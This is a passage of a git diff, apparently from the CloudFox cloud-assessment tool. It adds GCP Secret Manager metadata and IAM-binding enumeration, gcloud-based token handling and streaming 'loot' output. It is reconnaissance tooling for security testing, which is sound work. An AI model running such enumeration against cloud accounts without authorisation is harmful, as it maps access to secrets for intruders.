binding on a secret +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// SecretInfo contains secret metadata and security-relevant configuration type SecretInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectID"` - CreationTime string `json:"creationTime"` - Labels map[string]string `json:"labels"` - Rotation string `json:"rotation,omitempty"` + // Basic info + Name string `json:"name"` + ProjectID string `json:"projectID"` + + // Timestamps + CreationTime string `json:"creationTime"` + + // Replication + ReplicationType string `json:"replicationType"` // "automatic" or "user-managed" + ReplicaLocations []string `json:"replicaLocations,omitempty"` // Locations for user-managed replication + + // Encryption + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName,omitempty"` // KMS key for CMEK + + // Expiration + HasExpiration bool `json:"hasExpiration"` + ExpireTime string `json:"expireTime,omitempty"` + TTL string `json:"ttl,omitempty"` + + // Rotation + Rotation string `json:"rotation,omitempty"` + NextRotationTime string `json:"nextRotationTime,omitempty"` + RotationPeriod string `json:"rotationPeriod,omitempty"` + + // Version Management + VersionDestroyTTL string `json:"versionDestroyTtl,omitempty"` // Delayed destruction + + // Metadata + Labels map[string]string `json:"labels,omitempty"` + Annotations map[string]string `json:"annotations,omitempty"` + + // Topics (Pub/Sub notifications) + Topics []string `json:"topics,omitempty"` + + // Version Aliases + VersionAliases map[string]int64 `json:"versionAliases,omitempty"` + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings,omitempty"` } func (ss *SecretsService) Secrets(projectID string) ([]SecretInfo, error) { @@ -63,7 +143,7 @@ func (ss *SecretsService) Secrets(projectID string) ([]SecretInfo, error) { ctx := context.Background() it := ss.Client.ListSecrets(ctx, req) for { - resp, err := it.Next() //Here it errors out + resp, err := it.Next() if err == iterator.Done { break } @@ -71,13 +151,226 @@ func (ss *SecretsService) Secrets(projectID string) ([]SecretInfo, error) { return nil, fmt.Errorf("failed to list secrets: %v", err) } - secrets = append(secrets, SecretInfo{ + secret := SecretInfo{ Name: resp.Name, ProjectID: projectID, - CreationTime: resp.CreateTime.AsTime().String(), + CreationTime: resp.CreateTime.AsTime().Format(time.RFC3339), Labels: resp.Labels, - Rotation: resp.Rotation.String(), - }) + Annotations: resp.Annotations, + } + + // Parse replication type + if resp.Replication != nil { + switch r := resp.Replication.Replication.(type) { + case *secretmanagerpb.Replication_Automatic_: + secret.ReplicationType = "automatic" + // Check for CMEK in automatic replication + if r.Automatic != nil && r.Automatic.CustomerManagedEncryption != nil { + secret.EncryptionType = "CMEK" + secret.KMSKeyName = r.Automatic.CustomerManagedEncryption.KmsKeyName + } else { + secret.EncryptionType = "Google-managed" + } + case *secretmanagerpb.Replication_UserManaged_: + secret.ReplicationType = "user-managed" + if r.UserManaged != nil { + for _, replica := range r.UserManaged.Replicas { + secret.ReplicaLocations = append(secret.ReplicaLocations, replica.Location) + // Check for CMEK in user-managed replication + if replica.CustomerManagedEncryption != nil { + secret.EncryptionType = "CMEK" + secret.KMSKeyName = replica.CustomerManagedEncryption.KmsKeyName + } + } + } + if secret.EncryptionType == "" { + secret.EncryptionType = "Google-managed" + } + } + } + + // Parse expiration + if resp.Expiration != nil { + secret.HasExpiration = true + switch e := resp.Expiration.(type) { + case *secretmanagerpb.Secret_ExpireTime: + if e.ExpireTime != nil { + secret.ExpireTime = e.ExpireTime.AsTime().Format(time.RFC3339) + } + case *secretmanagerpb.Secret_Ttl: + if e.Ttl != nil { + secret.TTL = e.Ttl.AsDuration().String() + } + } + } + + // Parse rotation + if resp.Rotation != nil { + secret.Rotation = "enabled" + if resp.Rotation.NextRotationTime != nil { + secret.NextRotationTime = resp.Rotation.NextRotationTime.AsTime().Format(time.RFC3339) + } + if resp.Rotation.RotationPeriod != nil { + secret.RotationPeriod = resp.Rotation.RotationPeriod.AsDuration().String() + } + } else { + secret.Rotation = "disabled" + } + + // Get VersionDestroyTTL via REST API (may not be available in all SDK versions) + ss.enrichSecretFromRestAPI(ctx, &secret) + + // Parse topics + if len(resp.Topics) > 0 { + for _, topic := range resp.Topics { + secret.Topics = append(secret.Topics, topic.Name) + } + } + + // Parse version aliases + if len(resp.VersionAliases) > 0 { + secret.VersionAliases = resp.VersionAliases + } + + // Get IAM policy for the secret + iamBindings := ss.getSecretIAMPolicy(ctx, resp.Name) + secret.IAMBindings = iamBindings + + secrets = append(secrets, secret) } return secrets, nil } + +// getSecretIAMPolicy retrieves the IAM policy for a secret +func (ss *SecretsService) getSecretIAMPolicy(ctx context.Context, secretName string) []IAMBinding { + var bindings []IAMBinding + + if ss.Client.rawClient == nil { + return bindings + } + + // Get IAM policy using the raw client + policy, err := ss.Client.rawClient.IAM(secretName).Policy(ctx) + if err != nil { + // Return empty bindings if we can't get the policy (permission denied, etc.) + return bindings + } + + // Convert IAM policy to our binding format + for _, role := range policy.Roles() { + members := policy.Members(role) + if len(members) > 0 { + binding := IAMBinding{ + Role: string(role), + Members: make([]string, len(members)), + } + for i, member := range members { + binding.Members[i] = member + } + bindings = append(bindings, binding) + } + } + + return bindings +} + +// FormatIAMBindings formats IAM bindings for display +func FormatIAMBindings(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "No IAM bindings" + } + + var parts []string + for _, binding := range bindings { + memberStr := strings.Join(binding.Members, ", ") + parts = append(parts, fmt.Sprintf("%s: [%s]", binding.Role, memberStr)) + } + return strings.Join(parts, "; ") +} + +// FormatIAMBindingsShort formats IAM bindings in a shorter format for table display +func FormatIAMBindingsShort(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "-" + } + return fmt.Sprintf("%d binding(s)", len(bindings)) +} + +// secretAPIResponse represents the raw JSON response from Secret Manager API +// to capture fields that may not be in the SDK yet +type secretAPIResponse struct { + VersionDestroyTtl string `json:"versionDestroyTtl,omitempty"` +} + +// enrichSecretFromRestAPI fetches additional secret fields via direct HTTP request +// that may not be available in the Go SDK version +func (ss *SecretsService) enrichSecretFromRestAPI(ctx context.Context, secret *SecretInfo) { + var accessToken string + + // Try to use session token if available + if ss.session != nil { + token, err := ss.session.GetToken(ctx) + if err == nil { + accessToken = token + } + } + + // Fall back to default credentials if no session token + if accessToken == "" { + creds, err := google.FindDefaultCredentials(ctx, "https://www.googleapis.com/auth/cloud-platform") + if err != nil { + return + } + token, err := creds.TokenSource.Token() + if err != nil { + return + } + accessToken = token.AccessToken + } + + // Build the API URL + // Secret name format: projects/{project}/secrets/{secret} + url := fmt.Sprintf("https://secretmanager.googleapis.com/v1/%s", secret.Name) + + // Create request + req, err := http.NewRequestWithContext(ctx, "GET", url, nil) + if err != nil { + return + } + req.Header.Set("Authorization", "Bearer "+accessToken) + + // Make request + client := &http.Client{} + resp, err := client.Do(req) + if err != nil { + return + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return + } + + // Read response body + body, err := io.ReadAll(resp.Body) + if err != nil { + return + } + + // Parse JSON + var apiResp secretAPIResponse + if err := json.Unmarshal(body, &apiResp); err != nil { + return + } + + // Parse VersionDestroyTTL + if apiResp.VersionDestroyTtl != "" { + // Parse duration string (e.g., "86400s" for 1 day) + if dur, err := time.ParseDuration(apiResp.VersionDestroyTtl); err == nil { + secret.VersionDestroyTTL = dur.String() + } else { + // If parsing fails, use the raw value + secret.VersionDestroyTTL = apiResp.VersionDestroyTtl + } + } +} diff --git a/globals/gcp.go b/globals/gcp.go index 1ec42f68..153eec5f 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -1,15 +1,32 @@ package globals // Module names -// const GCP_WHOAMI_MODULE_NAME = "whoami" const GCP_ARTIFACT_RESGISTRY_MODULE_NAME string = "artifact-registry" const GCP_BIGQUERY_MODULE_NAME string = "bigquery" const GCP_BUCKETS_MODULE_NAME string = "buckets" const GCP_INSTANCES_MODULE_NAME string = "instances" const GCP_IAM_MODULE_NAME string = "iam" +const GCP_PERMISSIONS_MODULE_NAME string = "permissions" const GCP_SECRETS_MODULE_NAME string = "secrets" const GCP_WHOAMI_MODULE_NAME string = "whoami" +// New module names for future implementation +const GCP_FUNCTIONS_MODULE_NAME string = "functions" +const GCP_CLOUDRUN_MODULE_NAME string = "cloudrun" +const GCP_CLOUDSQL_MODULE_NAME string = "cloudsql" +const GCP_GKE_MODULE_NAME string = "gke" +const GCP_PUBSUB_MODULE_NAME string = "pubsub" +const GCP_KMS_MODULE_NAME string = "kms" +const GCP_SERVICEACCOUNTS_MODULE_NAME string = "serviceaccounts" +const GCP_LOGGING_MODULE_NAME string = "logging" +const GCP_NETWORKS_MODULE_NAME string = "networks" +const GCP_FIREWALL_MODULE_NAME string = "firewall" + +// Verbosity levels (matching Azure pattern) +var GCP_VERBOSITY int = 0 + +const GCP_VERBOSE_ERRORS = 9 + // const GCP_INVENTORY_MODULE_NAME string = "inventory" // const GCP_GCLOUD_REFRESH_TOKENS_DB_PATH = ".config/gcloud/credentials.db" // const GCP_GCLOUD_ACCESS_TOKENS_DB_PATH = ".config/gcloud/access_tokens.db" diff --git a/internal/gcp/base.go b/internal/gcp/base.go new file mode 100644 index 00000000..6386e15a --- /dev/null +++ b/internal/gcp/base.go @@ -0,0 +1,228 @@ +package gcpinternal + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + "github.com/spf13/cobra" +) + +// ------------------------------ +// CommandContext holds all common initialization data for GCP commands +// ------------------------------ +type CommandContext struct { + // Context and logger + Ctx context.Context + Logger internal.Logger + + // Project information + ProjectIDs []string + Account string // Authenticated account email + + // Configuration flags + Verbosity int + WrapTable bool + OutputDirectory string + Format string + Goroutines int +} + +// ------------------------------ +// BaseGCPModule - Embeddable struct with common fields for all GCP modules +// ------------------------------ +// This struct eliminates duplicate field declarations across modules. +// Modules embed this struct instead of declaring these fields individually. +// +// Usage: +// +// type BucketsModule struct { +// gcpinternal.BaseGCPModule // Embed the base fields +// +// // Module-specific fields +// Buckets []BucketInfo +// mu sync.Mutex +// } +type BaseGCPModule struct { + // Project and identity + ProjectIDs []string + Account string // Authenticated account email + + // Configuration + Verbosity int + WrapTable bool + OutputDirectory string + Format string + Goroutines int + + // Progress tracking (AWS/Azure style) + CommandCounter internal.CommandCounter +} + +// ------------------------------ +// NewBaseGCPModule - Helper to create BaseGCPModule from CommandContext +// ------------------------------ +func NewBaseGCPModule(cmdCtx *CommandContext) BaseGCPModule { + return BaseGCPModule{ + ProjectIDs: cmdCtx.ProjectIDs, + Account: cmdCtx.Account, + Verbosity: cmdCtx.Verbosity, + WrapTable: cmdCtx.WrapTable, + OutputDirectory: cmdCtx.OutputDirectory, + Format: cmdCtx.Format, + Goroutines: cmdCtx.Goroutines, + } +} + +// ------------------------------ +// ProjectProcessor - Callback function type for processing individual projects +// ------------------------------ +type ProjectProcessor func(ctx context.Context, projectID string, logger internal.Logger) + +// ------------------------------ +// RunProjectEnumeration - Orchestrates enumeration across multiple projects with concurrency +// ------------------------------ +// This method centralizes the project enumeration orchestration pattern. +// It handles WaitGroup, semaphore, spinner, and CommandCounter management automatically. +// +// Usage: +// +// func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { +// m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETS_MODULE_NAME, m.processProject) +// m.writeOutput(ctx, logger) +// } +func (b *BaseGCPModule) RunProjectEnumeration( + ctx context.Context, + logger internal.Logger, + projectIDs []string, + moduleName string, + processor ProjectProcessor, +) { + logger.InfoM(fmt.Sprintf("Enumerating resources for %d project(s)", len(projectIDs)), moduleName) + + // Setup synchronization primitives + var wg sync.WaitGroup + semaphore := make(chan struct{}, b.Goroutines) + + // Start progress spinner + spinnerDone := make(chan bool) + go internal.SpinUntil(moduleName, &b.CommandCounter, spinnerDone, "projects") + + // Process each project with goroutines + for _, projectID := range projectIDs { + b.CommandCounter.Total++ + b.CommandCounter.Pending++ + wg.Add(1) + + go func(project string) { + defer func() { + b.CommandCounter.Executing-- + b.CommandCounter.Complete++ + wg.Done() + }() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + b.CommandCounter.Pending-- + b.CommandCounter.Executing++ + + // Call the module-specific processor + processor(ctx, project, logger) + }(projectID) + } + + // Wait for all projects to complete + wg.Wait() + + // Stop spinner + spinnerDone <- true + <-spinnerDone +} + +// ------------------------------ +// parseMultiValueFlag parses a flag value that can contain comma-separated +// and/or space-separated values +// ------------------------------ +func parseMultiValueFlag(flagValue string) []string { + if flagValue == "" { + return nil + } + + // Replace commas with spaces, then split by whitespace + normalized := strings.ReplaceAll(flagValue, ",", " ") + fields := strings.Fields(normalized) + + // Deduplicate while preserving order + seen := make(map[string]bool) + result := []string{} + for _, field := range fields { + if !seen[field] { + seen[field] = true + result = append(result, field) + } + } + return result +} + +// ------------------------------ +// InitializeCommandContext - Eliminates duplicate initialization code across commands +// ------------------------------ +// This helper extracts flags, resolves projects and account info. +// +// Usage: +// +// cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETS_MODULE_NAME) +// if err != nil { +// return // error already logged +// } +func InitializeCommandContext(cmd *cobra.Command, moduleName string) (*CommandContext, error) { + ctx := cmd.Context() + logger := internal.NewLogger() + + // -------------------- Extract flags -------------------- + parentCmd := cmd.Parent() + verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") + wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") + outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") + format, _ := parentCmd.PersistentFlags().GetString("output") + + // -------------------- Get project IDs from context -------------------- + var projectIDs []string + if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { + projectIDs = value + } else { + logger.ErrorM("Could not retrieve projectIDs from context or value is empty", moduleName) + return nil, fmt.Errorf("no project IDs provided") + } + + // -------------------- Get account from context -------------------- + var account string + if value, ok := ctx.Value("account").(string); ok { + account = value + } else { + logger.ErrorM("Could not retrieve account email from context", moduleName) + // Don't fail - some modules can continue without account info + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Resolved %d project(s), account: %s", len(projectIDs), account), moduleName) + } + + // -------------------- Build and return context -------------------- + return &CommandContext{ + Ctx: ctx, + Logger: logger, + ProjectIDs: projectIDs, + Account: account, + Verbosity: verbosity, + WrapTable: wrap, + OutputDirectory: outputDirectory, + Format: format, + Goroutines: 5, // Default concurrency + }, nil +} diff --git a/internal/gcp/session.go b/internal/gcp/session.go new file mode 100644 index 00000000..81640420 --- /dev/null +++ b/internal/gcp/session.go @@ -0,0 +1,442 @@ +package gcpinternal + +import ( + "context" + "encoding/json" + "fmt" + "os/exec" + "strings" + "sync" + "time" + + "golang.org/x/oauth2" + "golang.org/x/oauth2/google" + "google.golang.org/api/option" +) + +// CommonScopes defines the common OAuth scopes used by GCP services +var CommonScopes = []string{ + "https://www.googleapis.com/auth/cloud-platform", // Full GCP access + "https://www.googleapis.com/auth/cloud-platform.read-only", // Read-only GCP access + "https://www.googleapis.com/auth/compute", // Compute Engine access + "https://www.googleapis.com/auth/devstorage.full_control", // Cloud Storage full access +} + +// SafeSession provides thread-safe GCP authentication with token caching and auto-refresh +type SafeSession struct { + mu sync.Mutex + tokenSource oauth2.TokenSource + currentToken *oauth2.Token + tokens map[string]*oauth2.Token // scope -> token + sessionExpiry time.Time // When the current token expires + monitoring bool // Whether background monitoring is active + stopMonitor chan struct{} // Signal to stop monitoring + refreshBuffer time.Duration // How early to refresh before expiry (default 5 min) + + // Identity info + email string + projectID string + accountType string // "user" or "serviceAccount" +} + +// GCPCredentialInfo holds information about the current credential +type GCPCredentialInfo struct { + Email string `json:"email"` + AccountType string `json:"account_type"` // user, serviceAccount + ProjectID string `json:"project_id"` + Scopes []string +} + +// StaticTokenSource wraps a token for use with GCP clients +type StaticTokenSource struct { + StaticToken *oauth2.Token +} + +// Token returns the static token (implements oauth2.TokenSource) +func (s *StaticTokenSource) Token() (*oauth2.Token, error) { + return s.StaticToken, nil +} + +// NewSafeSession initializes a session using Application Default Credentials +// and prefetches tokens for common scopes +func NewSafeSession(ctx context.Context) (*SafeSession, error) { + // Check if gcloud is authenticated + if !IsSessionValid() { + return nil, fmt.Errorf("GCP session invalid; run 'gcloud auth application-default login' or 'gcloud auth login'") + } + + // Create token source from ADC + ts, err := google.DefaultTokenSource(ctx, CommonScopes...) + if err != nil { + return nil, fmt.Errorf("failed to create token source: %w", err) + } + + ss := &SafeSession{ + tokenSource: ts, + tokens: make(map[string]*oauth2.Token), + refreshBuffer: 5 * time.Minute, + stopMonitor: make(chan struct{}), + } + + // Get initial token and extract expiry + token, err := ts.Token() + if err != nil { + return nil, fmt.Errorf("failed to get initial token: %w", err) + } + ss.currentToken = token + ss.sessionExpiry = token.Expiry + + // Get identity info + info, err := ss.getCurrentIdentity(ctx) + if err == nil { + ss.email = info.Email + ss.accountType = info.AccountType + ss.projectID = info.ProjectID + } + + // Cache the token for the default scope + ss.tokens["https://www.googleapis.com/auth/cloud-platform"] = token + + return ss, nil +} + +// NewSmartSession creates a session with automatic monitoring and refresh +func NewSmartSession(ctx context.Context) (*SafeSession, error) { + ss, err := NewSafeSession(ctx) + if err != nil { + return nil, err + } + + // Start background monitoring + ss.StartMonitoring(ctx) + + return ss, nil +} + +// ------------------------- TOKEN METHODS ------------------------- + +// GetToken returns a valid access token, refreshing if necessary +func (s *SafeSession) GetToken(ctx context.Context) (string, error) { + s.mu.Lock() + defer s.mu.Unlock() + return s.getTokenUnlocked(ctx) +} + +// getTokenUnlocked returns a token without locking (caller must hold lock) +func (s *SafeSession) getTokenUnlocked(ctx context.Context) (string, error) { + // Check if current token is still valid + if s.currentToken != nil && s.currentToken.Valid() { + return s.currentToken.AccessToken, nil + } + + // Refresh the token + token, err := s.tokenSource.Token() + if err != nil { + return "", fmt.Errorf("failed to refresh token: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + + return token.AccessToken, nil +} + +// GetTokenForScope returns a token for a specific OAuth scope +func (s *SafeSession) GetTokenForScope(ctx context.Context, scope string) (string, error) { + s.mu.Lock() + defer s.mu.Unlock() + + // Check cache first + if tok, ok := s.tokens[scope]; ok && tok.Valid() { + return tok.AccessToken, nil + } + + // Get a new token source for this scope + ts, err := google.DefaultTokenSource(ctx, scope) + if err != nil { + return "", fmt.Errorf("failed to create token source for scope %s: %w", scope, err) + } + + token, err := ts.Token() + if err != nil { + return "", fmt.Errorf("failed to get token for scope %s: %w", scope, err) + } + + // Cache the token + s.tokens[scope] = token + + return token.AccessToken, nil +} + +// GetTokenSource returns the underlying token source for use with GCP clients +func (s *SafeSession) GetTokenSource() oauth2.TokenSource { + return s.tokenSource +} + +// GetClientOption returns a client option for use with GCP API clients +func (s *SafeSession) GetClientOption() option.ClientOption { + return option.WithTokenSource(s.tokenSource) +} + +// GetTokenWithRetry attempts to get a token with automatic retry on failure +func (s *SafeSession) GetTokenWithRetry(ctx context.Context) (string, error) { + token, err := s.GetToken(ctx) + if err != nil { + // Try to refresh session and retry once + if refreshErr := s.RefreshSession(ctx); refreshErr == nil { + token, err = s.GetToken(ctx) + } + } + return token, err +} + +// ------------------------- SESSION MANAGEMENT ------------------------- + +// Ensure validates or refreshes the current session +func (s *SafeSession) Ensure(ctx context.Context) error { + s.mu.Lock() + defer s.mu.Unlock() + + if s.currentToken != nil && s.currentToken.Valid() { + return nil + } + + // Try to get a new token + token, err := s.tokenSource.Token() + if err != nil { + return fmt.Errorf("GCP session invalid or expired: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + return nil +} + +// IsSessionExpired checks if the session has expired or will expire soon +func (s *SafeSession) IsSessionExpired() bool { + s.mu.Lock() + defer s.mu.Unlock() + + if s.sessionExpiry.IsZero() { + return false + } + + // Consider expired if within refresh buffer + return time.Now().Add(s.refreshBuffer).After(s.sessionExpiry) +} + +// RefreshSession refreshes the token and clears the cache +func (s *SafeSession) RefreshSession(ctx context.Context) error { + s.mu.Lock() + defer s.mu.Unlock() + + // Check if gcloud session is still valid + if !IsSessionValid() { + return fmt.Errorf("GCP session expired; please run 'gcloud auth login' or 'gcloud auth application-default login'") + } + + // Create new token source + ts, err := google.DefaultTokenSource(ctx, CommonScopes...) + if err != nil { + return fmt.Errorf("failed to create token source: %w", err) + } + s.tokenSource = ts + + // Get fresh token + token, err := ts.Token() + if err != nil { + return fmt.Errorf("failed to get fresh token: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + + // Clear token cache + s.tokens = make(map[string]*oauth2.Token) + s.tokens["https://www.googleapis.com/auth/cloud-platform"] = token + + return nil +} + +// ------------------------- MONITORING ------------------------- + +// StartMonitoring begins background monitoring of session health +func (s *SafeSession) StartMonitoring(ctx context.Context) { + s.mu.Lock() + if s.monitoring { + s.mu.Unlock() + return + } + s.monitoring = true + s.mu.Unlock() + + go s.monitorSession(ctx) +} + +// StopMonitoring stops the background session monitor +func (s *SafeSession) StopMonitoring() { + s.mu.Lock() + defer s.mu.Unlock() + + if !s.monitoring { + return + } + + s.monitoring = false + close(s.stopMonitor) +} + +// monitorSession runs in background to monitor and refresh session +func (s *SafeSession) monitorSession(ctx context.Context) { + ticker := time.NewTicker(1 * time.Minute) + defer ticker.Stop() + + for { + select { + case <-s.stopMonitor: + return + case <-ctx.Done(): + return + case <-ticker.C: + if s.IsSessionExpired() { + if err := s.RefreshSession(ctx); err != nil { + fmt.Printf("smart session: auto-refresh failed: %v\n", err) + fmt.Println("smart session: please run 'gcloud auth login' to re-authenticate") + } + } + } + } +} + +// ------------------------- IDENTITY INFO ------------------------- + +// GetEmail returns the email of the authenticated identity +func (s *SafeSession) GetEmail() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.email +} + +// GetAccountType returns the type of account (user or serviceAccount) +func (s *SafeSession) GetAccountType() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.accountType +} + +// GetProjectID returns the default project ID +func (s *SafeSession) GetProjectID() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.projectID +} + +// GetSessionExpiry returns when the current token expires +func (s *SafeSession) GetSessionExpiry() time.Time { + s.mu.Lock() + defer s.mu.Unlock() + return s.sessionExpiry +} + +// getCurrentIdentity retrieves identity info from gcloud +func (s *SafeSession) getCurrentIdentity(ctx context.Context) (*GCPCredentialInfo, error) { + // Try gcloud auth list to get current account + out, err := exec.CommandContext(ctx, "gcloud", "auth", "list", "--filter=status:ACTIVE", "--format=json").Output() + if err != nil { + return nil, fmt.Errorf("failed to get gcloud auth list: %w", err) + } + + var accounts []struct { + Account string `json:"account"` + Status string `json:"status"` + } + if err := json.Unmarshal(out, &accounts); err != nil { + return nil, fmt.Errorf("failed to parse gcloud auth list: %w", err) + } + + info := &GCPCredentialInfo{} + if len(accounts) > 0 { + info.Email = accounts[0].Account + // Determine account type from email format + if strings.Contains(info.Email, ".iam.gserviceaccount.com") { + info.AccountType = "serviceAccount" + } else { + info.AccountType = "user" + } + } + + // Get default project + projectOut, err := exec.CommandContext(ctx, "gcloud", "config", "get-value", "project").Output() + if err == nil { + info.ProjectID = strings.TrimSpace(string(projectOut)) + } + + return info, nil +} + +// CurrentUser returns the current identity's email and account type +func (s *SafeSession) CurrentUser(ctx context.Context) (email, accountType string, err error) { + info, err := s.getCurrentIdentity(ctx) + if err != nil { + return "UNKNOWN", "UNKNOWN", err + } + return info.Email, info.AccountType, nil +} + +// ------------------------- HELPER FUNCTIONS ------------------------- + +// IsSessionValid checks if gcloud is authenticated +func IsSessionValid() bool { + // Check if we can get a token via gcloud + out, err := exec.Command("gcloud", "auth", "print-access-token").Output() + if err != nil { + return false + } + + token := strings.TrimSpace(string(out)) + return token != "" && !strings.Contains(token, "ERROR") +} + +// IsADCConfigured checks if Application Default Credentials are configured +func IsADCConfigured() bool { + ctx := context.Background() + _, err := google.DefaultTokenSource(ctx, "https://www.googleapis.com/auth/cloud-platform") + return err == nil +} + +// GetDefaultProject returns the default GCP project from gcloud config +func GetDefaultProject() string { + out, err := exec.Command("gcloud", "config", "get-value", "project").Output() + if err != nil { + return "" + } + return strings.TrimSpace(string(out)) +} + +// GetDefaultAccount returns the default account from gcloud config +func GetDefaultAccount() string { + out, err := exec.Command("gcloud", "config", "get-value", "account").Output() + if err != nil { + return "" + } + return strings.TrimSpace(string(out)) +} + +// GetAccessToken returns a fresh access token from gcloud CLI +// This is useful for REST API calls that need a bearer token +func GetAccessToken() (string, error) { + out, err := exec.Command("gcloud", "auth", "print-access-token").Output() + if err != nil { + return "", fmt.Errorf("failed to get access token: %w", err) + } + return strings.TrimSpace(string(out)), nil +} + +// GetAccessTokenForAccount returns an access token for a specific account +func GetAccessTokenForAccount(account string) (string, error) { + out, err := exec.Command("gcloud", "auth", "print-access-token", "--account", account).Output() + if err != nil { + return "", fmt.Errorf("failed to get access token for account %s: %w", account, err) + } + return strings.TrimSpace(string(out)), nil +} diff --git a/internal/output2.go b/internal/output2.go index 355dfe56..0455d26a 100644 --- a/internal/output2.go +++ b/internal/output2.go @@ -1,6 +1,7 @@ package internal import ( + "bufio" "encoding/csv" "encoding/json" "fmt" @@ -10,6 +11,7 @@ import ( "path/filepath" "regexp" "strings" + "sync" "github.com/aquasecurity/table" "github.com/fatih/color" @@ -24,6 +26,9 @@ var fileSystem = afero.NewOsFs() // Color functions var cyan = color.New(color.FgCyan).SprintFunc() +// global lock to prevent concurrent write races +var lootFileMu sync.Mutex + type OutputClient struct { Verbosity int CallingModule string @@ -60,6 +65,20 @@ type LootFile struct { Contents string } +// TableCol represents a column definition for table output +type TableCol struct { + Name string + Width int +} + +// TableFiles represents table output configuration +type TableFiles struct { + Directory string + TableCols []TableCol + ResultsFile string + LootFile string +} + // TODO support datastructures that enable brief or wide format type CloudfoxOutput interface { TableFiles() []TableFile @@ -103,6 +122,412 @@ func HandleOutput( return nil } +// HandleStreamingOutput writes table and loot files incrementally, then finalizes tables at the end. +// Uses the new directory structure: cloudfox-output/{CloudProvider}/{Principal}/{ScopeIdentifier}/ +func HandleStreamingOutput( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + dataToOutput CloudfoxOutput, +) error { + logger := NewLogger() + + // Build scope identifier using same logic as HandleOutputSmart + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Determine base module name from first table file (for backwards compatibility) + baseCloudfoxModule := "" + if len(dataToOutput.TableFiles()) > 0 { + baseCloudfoxModule = dataToOutput.TableFiles()[0].Name + } + + // Build consistent output path using NEW structure + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + if err := os.MkdirAll(outDirectoryPath, 0o755); err != nil { + return fmt.Errorf("failed to create output directory: %w", err) + } + + // ---- STREAM ROWS TO TEMP FILES ---- + for _, t := range dataToOutput.TableFiles() { + if verbosity > 0 { + tmpClient := TableClient{Wrap: wrap} + tmpClient.printTablesToScreen([]TableFile{t}) + } + + safeName := sanitizeFileName(t.Name) + tmpTablePath := filepath.Join(outDirectoryPath, safeName+".tmp") + if err := os.MkdirAll(filepath.Dir(tmpTablePath), 0o755); err != nil { + return fmt.Errorf("failed to create parent directory for temp table: %w", err) + } + + tmpTableFile, err := os.OpenFile(tmpTablePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open temporary table file: %w", err) + } + defer tmpTableFile.Close() + + // Append each row into the tmp file + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + if _, err := tmpTableFile.WriteString(strings.Join(cleanRow, ",") + "\n"); err != nil { + return fmt.Errorf("failed to append row to tmp table: %w", err) + } + } + + // Stream CSV rows + if format == "all" || format == "csv" { + csvPath := filepath.Join(outDirectoryPath, "csv", safeName+".csv") + if err := os.MkdirAll(filepath.Dir(csvPath), 0o755); err != nil { + return fmt.Errorf("failed to create csv directory: %w", err) + } + csvFile, err := os.OpenFile(csvPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open csv file: %w", err) + } + defer csvFile.Close() + + info, _ := csvFile.Stat() + if info.Size() == 0 { + _, _ = csvFile.WriteString(strings.Join(t.Header, ",") + "\n") + } + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + _, _ = csvFile.WriteString(strings.Join(cleanRow, ",") + "\n") + } + } + + // Stream JSONL rows + if format == "all" || format == "json" { + if err := AppendJSONL(outDirectoryPath, t); err != nil { + return fmt.Errorf("failed to append JSONL: %w", err) + } + } + } + + // ---- STREAM LOOT ---- + for _, l := range dataToOutput.LootFiles() { + lootDir := filepath.Join(outDirectoryPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + lootFile, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + defer lootFile.Close() + + scanner := bufio.NewScanner(strings.NewReader(l.Contents)) + for scanner.Scan() { + if _, err := lootFile.WriteString(scanner.Text() + "\n"); err != nil { + return fmt.Errorf("failed to append loot line: %w", err) + } + } + if err := scanner.Err(); err != nil { + return fmt.Errorf("error reading loot lines: %w", err) + } + } + + // ---- FINALIZE TABLES MEMORY-SAFE ---- + if err := StreamFinalizeTables(cloudProvider, format, outputDirectory, verbosity, wrap, scopeType, scopeIdentifiers, scopeNames, principal, nil); err != nil { + return fmt.Errorf("failed to finalize tables: %w", err) + } + + if verbosity >= 2 { + logger.InfoM(fmt.Sprintf("Output written to %s", outDirectoryPath), baseCloudfoxModule) + } + + 